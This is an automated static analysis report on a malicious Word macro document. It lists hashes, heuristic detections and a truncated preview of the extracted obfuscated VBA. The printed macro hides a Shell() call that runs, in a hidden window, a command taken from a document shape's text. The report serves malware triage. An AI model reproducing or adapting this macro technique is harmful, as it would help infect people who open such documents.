Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2d5caba6f7f04cd2…

MALICIOUS

Office (OLE)

86.6 KB Created: 2018-11-14 12:45:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: dc25b02f3d410bdc34394862da2a2381 SHA-1: 46117432056ecd8918f2c2a01157bf24c84b432e SHA-256: 2d5caba6f7f04cd29245bd72faa63f47964c98ce9c4b995bb7d4a8a134555d0a
242 Risk Score

Heuristics 7

  • ClamAV: Doc.Malware.Generic-6749861-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6749861-0. This is a generic document-malware signature: it supports the MALICIOUS verdict but carries no family or campaign attribution on its own.
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA. In the extracted macros.bas the command passed to Shell() is not a literal in the macro source: it is built at runtime as a concatenation that includes the text of a document shape (`Shapes(...).TextFrame.ContainingRange`) plus several variables that are not assigned in the visible part of the listing, and the window-style argument is a constant that evaluates to 0 (`507391445 - 507391445`), i.e. the spawned process window is hidden. The actual command line therefore has to be recovered from the document body/shape text (or by dynamic analysis), not from the VBA project alone.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro (the macro runs automatically when the document is opened and macros are enabled). The AutoOpen procedure itself is not within the truncated preview below, which shows only the helper function JhwtqtVUjsX; check the full macros.bas for the entry point and what it calls.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This heuristic exists to catch p-code-only or source-extraction-failure macro documents where visible source is unavailable; in this report the VBA source was recovered (see Extracted artifacts), so here it corroborates OLE_VBA_AUTOOPEN and OLE_VBA_SHELL rather than being the only evidence of the macro's behaviour.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. By its own description this finding applies when no modern VBA project was recovered and no stronger macro-virus family marker was present, yet this report did recover a VBA project (macros.bas in Extracted artifacts). Treat it as redundant with OLE_VBA_AUTOOPEN rather than as independent evidence of a separate WordBasic payload, and confirm whether the AutoOpen string that triggered it simply came from the VBA project streams. It is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is a standard Office XML namespace identifier that is expected inside Word documents; it is not a network indicator (no C2 or download URL) and should not be blocked or hunted on.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8194 bytes
SHA-256: 676a15f5ca5d107e585e0994a563d10973328cd5953ae5fa06427df42073b6c1
Preview script
First 1,000 lines of the extracted script (the preview below is itself truncated; the remainder of macros.bas, including the AutoOpen entry point, is not shown). The repeated For loops iterate over Len() of variables that are never assigned in the visible code and accumulate into results that are never used, so they appear to be padding/obfuscation; the operative statements in the visible portion are the `Shapes(...).TextFrame.ContainingRange` read (command text taken from a document shape) and the `Shell(..., 0)` call that executes it with a hidden window.
' Module attribute header as exported by olevba for the recovered VBA project.
' VB_Name is a randomized module name; VB_Base = "1Normal.ThisDocument" together
' with VB_PredeclaredId/VB_Exposed = True is the attribute set typically carried
' by a document-hosted (ThisDocument-style) module rather than a standard module.
' NOTE(review): inferred from the attribute values only — confirm against the
' VBA project's dir/module streams.
Attribute VB_Name = "YMwzAFC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function JhwtqtVUjsX()
Const UAptjJEt = 507391445 - 507391445
   Dim WZmnCBBGa, mIfhziYv, ObBuX, oKvDBUpnZ
    mIfhziYv = Len(aBLOWuA)
    oKvDBUpnZ = ""
    For WZmnCBBGa = 1 To mIfhziYv
        oKvDBUpnZ = oKvDBUpnZ & (42 + ((ObBuX + 19) Mod 90))
        If ObBuX >= 19 And ObBuX <= 54 Then
            oKvDBUpnZ = oKvDBUpnZ & (46 + ((ObBuX + 28) Mod 113))
        Else
            oKvDBUpnZ = oKvDBUpnZ & (ObBuX)
        End If
    Next
OmsQUVfOo = oKvDBUpnZ

   Dim wBzcprfzi, BiPDoVj, nbjaKbsSw, bmGBLfO
    BiPDoVj = Len(VrYIaPRPi)
    bmGBLfO = ""
    For wBzcprfzi = 1 To BiPDoVj
        bmGBLfO = bmGBLfO & (35 + ((nbjaKbsSw + 27) Mod 130))
        If nbjaKbsSw >= 25 And nbjaKbsSw <= 67 Then
            bmGBLfO = bmGBLfO & (26 + ((nbjaKbsSw + 35) Mod 159))
        Else
            bmGBLfO = bmGBLfO & (nbjaKbsSw)
        End If
    Next
QXqVjX = bmGBLfO

   Dim XsYzT, otAsaiBU, vzVOd, sTNDBPqE
    otAsaiBU = Len(HBQTrZrfE)
    sTNDBPqE = ""
    For XsYzT = 1 To otAsaiBU
        sTNDBPqE = sTNDBPqE & (25 + ((vzVOd + 26) Mod 145))
        If vzVOd >= 18 And vzVOd <= 78 Then
            sTNDBPqE = sTNDBPqE & (41 + ((vzVOd + 49) Mod 88))
        Else
            sTNDBPqE = sTNDBPqE & (vzVOd)
        End If
    Next
PuYOIOViY = sTNDBPqE

   Dim FDYTzVFEX, NjiTbpc, QlnDMnhzX, HvmWA
    NjiTbpc = Len(oznzfMwS)
    HvmWA = ""
    For FDYTzVFEX = 1 To NjiTbpc
        HvmWA = HvmWA & (15 + ((QlnDMnhzX + 29) Mod 149))
        If QlnDMnhzX >= 12 And QlnDMnhzX <= 91 Then
            HvmWA = HvmWA & (47 + ((QlnDMnhzX + 14) Mod 173))
        Else
            HvmWA = HvmWA & (QlnDMnhzX)
        End If
    Next
CTYcDCql = HvmWA

WjXuzYck = "" + UwoAkY + cjERRtw + Shapes(tvirT + btsBz + 1 + jimAh + ptGbTfq).TextFrame.ContainingRange + PQdUiOOa + iYrjMk
   Dim LFPSsGL, FphZwz, wfGlc, vFhCwjPFE
    FphZwz = Len(TZimM)
    vFhCwjPFE = ""
    For LFPSsGL = 1 To FphZwz
        vFhCwjPFE = vFhCwjPFE & (47 + ((wfGlc + 10) Mod 99))
        If wfGlc >= 39 And wfGlc <= 76 Then
            vFhCwjPFE = vFhCwjPFE & (29 + ((wfGlc + 45) Mod 133))
        Else
            vFhCwjPFE = vFhCwjPFE & (wfGlc)
        End If
    Next
WFkEdJF = vFhCwjPFE

   Dim XjisRmcD, bQzvT, wdlTrWS, MzKaJw
    bQzvT = Len(uqDzSW)
    MzKaJw = ""
    For XjisRmcD = 1 To bQzvT
        MzKaJw = MzKaJw & (20 + ((wdlTrWS + 15) Mod 140))
        If wdlTrWS >= 28 And wdlTrWS <= 63 Then
            MzKaJw = MzKaJw & (41 + ((wdlTrWS + 12) Mod 54))
        Else
            MzKaJw = MzKaJw & (wdlTrWS)
        End If
    Next
JBbKDuDa = MzKaJw

adMbpzsmdTX = Shell(WjXuzYck + pZQAhQtX + AfNARL, UAptjJEt)
   Dim iHnklGri, FdvTkkCsw, XIUab, zldXinnZV
    FdvTkkCsw = Len(sfFcFb)
    zldXinnZV = ""
    For iHnklGri = 1 To FdvTkkCsw
        zldXinnZV = zldXinnZV & (12 + ((XIUab + 41) Mod 182))
        If XIUab >= 10 And XIUab <= 77 Then
            zldXinnZV = zldXinnZV & (23 + ((XIUab + 17) Mod 117))
        Else
            zldXinnZV = zldXinnZV & (XIUab)
        End If
    Next
GVVOuU = zldXinnZV

   Dim fbtwZZicS, FFzpMikFV, ZikViM, qrknSVO
    FFzpMikFV = Len(VvsArRFw)
    qrknSVO = ""
    For fbtwZZicS = 1 To FFzpMikFV
        qrknSVO = qrknSVO & (37 + ((ZikViM + 25) Mod 168))
        If ZikViM >= 45 And ZikViM <= 84 Then
            qrknSVO = qrknSVO & (17 + ((ZikViM + 34) Mod 198))
        Else
            qrknSVO = qrknSVO & (ZikViM)
        End If
    Next
RzrYNME = qrknSVO

   Dim qJFrzQDRf, ZhThU, dtAzjJEa, CjclzYhz
    ZhThU = Len(XfEzYuwb)
    CjclzYhz = ""
    For qJFrzQDRf = 1 To ZhThU
        CjclzYhz = CjclzYhz & (29 + ((dtAzjJEa + 12) Mod 172))
        If dtAzjJEa >= 19 And dtAzjJEa <= 65 Then
            CjclzYhz = CjclzYhz & (34 + ((dtAzjJEa + 10) Mod 151))
        Else
            
... (truncated)